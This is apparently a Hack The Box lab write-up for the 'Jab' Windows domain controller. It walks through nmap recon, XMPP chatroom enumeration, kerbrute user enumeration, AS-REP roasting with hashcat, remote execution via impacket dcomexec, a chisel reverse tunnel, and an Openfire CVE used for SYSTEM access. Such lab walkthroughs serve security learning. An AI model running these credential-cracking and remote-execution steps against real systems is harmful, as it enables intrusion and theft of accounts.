Jab

Recon

Let's start with a nmap scan.

┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p- -T4 jab.htb                                                                                                       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:17 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).
Not shown: 65459 closed tcp ports (conn-refused), 40 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5222/tcp  open  xmpp-client
5223/tcp  open  hpvirtgrp
5262/tcp  open  unknown
5263/tcp  open  unknown
5269/tcp  open  xmpp-server
5270/tcp  open  xmp
5275/tcp  open  unknown
5276/tcp  open  unknown
5985/tcp  open  wsman
7070/tcp  open  realserver
7443/tcp  open  oracleas-https
7777/tcp  open  cbt
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49674/tcp open  unknown
49675/tcp open  unknown
49676/tcp open  unknown
49681/tcp open  unknown
49790/tcp open  unknown
53728/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 301.96 seconds

                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~/Desktop/HTB/Jab]
└─$ nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49790,53728 -sC -sV -T4 jab.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-22 08:27 BST
Nmap scan report for jab.htb (10.10.11.4)
Host is up (0.044s latency).

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-04-22 07:23:30Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-04-22T07:24:48+00:00; -4m13s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-04-22T07:24:46+00:00; -4m14s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
5222/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 8mjpiz9qic
5223/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5262/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 55iww1rf7w
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
|_ssl-date: TLS randomness does not represent time
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   Respects server name
|   info: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|   pre_tls: 
|     xmpp: 
|     capabilities: 
|     features: 
|       TLS
|       Server Dialback
|   post_tls: 
|     xmpp: 
|       lang: en-US
|_    capabilities: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     auth_mechanisms: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|       version: 1.0
|     capabilities: 
|_    stream_id: 7529c6ngrx
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       (timeout)
|     compression_methods: 
|     features: 
|     xmpp: 
|     auth_mechanisms: 
|_    capabilities: 
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7070/tcp  open  realserver?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:29 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:35 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:36 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Mon, 22 Apr 2024 07:23:41 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49790/tcp open  msrpc               Microsoft Windows RPC
53728/tcp open  msrpc               Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7070-TCP:V=7.94SVN%I=7%D=4/22%Time=6626116F%P=x86_64-pc-linux-gnu%r
...
SF:h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port7443-TCP:V=7.94SVN%T=SSL%I=7%D=4/22%Time=66261175%P=x86_64-pc-linux
SF:-gnu%r(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Mon,\x2022\x2
SF:0Apr\x202024\x2007:23:36\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\
...
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x16</pre>");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-04-22T07:24:39
|_  start_date: N/A
|_clock-skew: mean: -4m13s, deviation: 0s, median: -4m13s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.01 seconds

There are numerous open ports detected on the Windows system. As we explore further, we observe several domain names. To facilitate access to these domains, we should add their entries to the /etc/hosts file.

At first glance, the presence of open ports 88 and 389 indicates the presence of a domain controller. We can also notice some non-standard ports 5222 , 5269 , 7070 , 7443 , 7777. From the same Nmap result we can understand that this machine running XMPP protocol.

Doing some googlin, we have messaging service to explore. let’s dig on it to learn more about it.

First of all we need to find a way to interact with this service, so again doing some googling we find something interesting.

Since we've identified that the machine is running the server, we now require a client to interact with it. As this is a well-known and open protocol, finding a suitable client should be relatively straightforward.

Now, we need to download a client, let’s pick pidgin as client since it’s super easy to install and use.

To access the chatroom, you'll need to create an account on the server. Once you've done that, you can join the test2@conference.jab.htb chat room. However, if there's no one currently present in the chat room, you may not find anyone to interact with. In such a case, you can leave the chat room.

Additionally, using a pidgin’s plugin we can do service discovery.

As very first step we can try to enumerate all users inside the jab.htb domain to do we need:

A user list available online.

A tool to send requests to DC, we use kerbrute

kerbrute userenum --dc dc01.jab.htb -d jab.htb -v jsmith.txt --hash-file NP.txt | tee kerbrute.out

Another important insight gained from this action is the harvesting of TGT (ticket-granting ticket) hashes. This is made possible due to the absence of pre-authentication, making the server vulnerable to AS_REP roasting attacks.

Run HashCat on those hashes using rockyou.txt

hashcat hashes.asreproast  /usr/share/wordlists/rockyou.txt

We got The password of jmontgomery. Now we can go back to pidgin and login using those creds.

After Login we search for rooms again. We found a new room: Pentest2003.

Joining that room gives us the password of svc_openfire.

Initial Access

Using impacket’s dcomexec.py and svc_openfire's creds we can get a reverse shell.

impacket-dcomexec 'jab.htb/svc_openfire:Password@dc01.jab.thb' 'command' -nooutput -object MMC20 -dc-ip 10.10.11.4

We have our user flag.

Privilege Escalation

Upon conducting further enumeration, we uncovered the presence of peculiar ports, specifically 9090 and 9091, active on the local system.

netstat -ano | findstr '127.0.0.1:'

We can test whether we have a web app:

Invoke-WebRequest -Uri http://127.0.0.1:9090/ -UseBasicParsing

Upon receiving a response with HTTP/1.1 200 OK, we can deduce that a web application is indeed running locally. To facilitate interaction with this application, we must establish port forwarding from the DC machine to our attack box, allowing access to the service locally on our box. We'll employ the well-known tool Chisel to accomplish this task.

First we need to setup a chisel server on our attack box:

chisel server -p 9999 --reverse

Next, we need to transfer chisel and then setup a client on DC compute then connect to server:

To utilize Chisel effectively, we'll need to download a version suitable for Linux to use on Kali and another version for Windows to use on the target system.

./chisel client 10.10.14.140:9999 R:9090:127.0.0.1:9090

Now, by navigating to http://127.0.0.1:9090, we gain access to and can interact with this web application.

We Can Login using svc_openfire username and his password we found earlier.

This web server is vulnerable to CVE-2023–32315.

Using this we can confirm we are root/system.

We can setup another netcat listner to catch a reverse shell as root.

We've got our root flag.

Last updated

Was this helpful?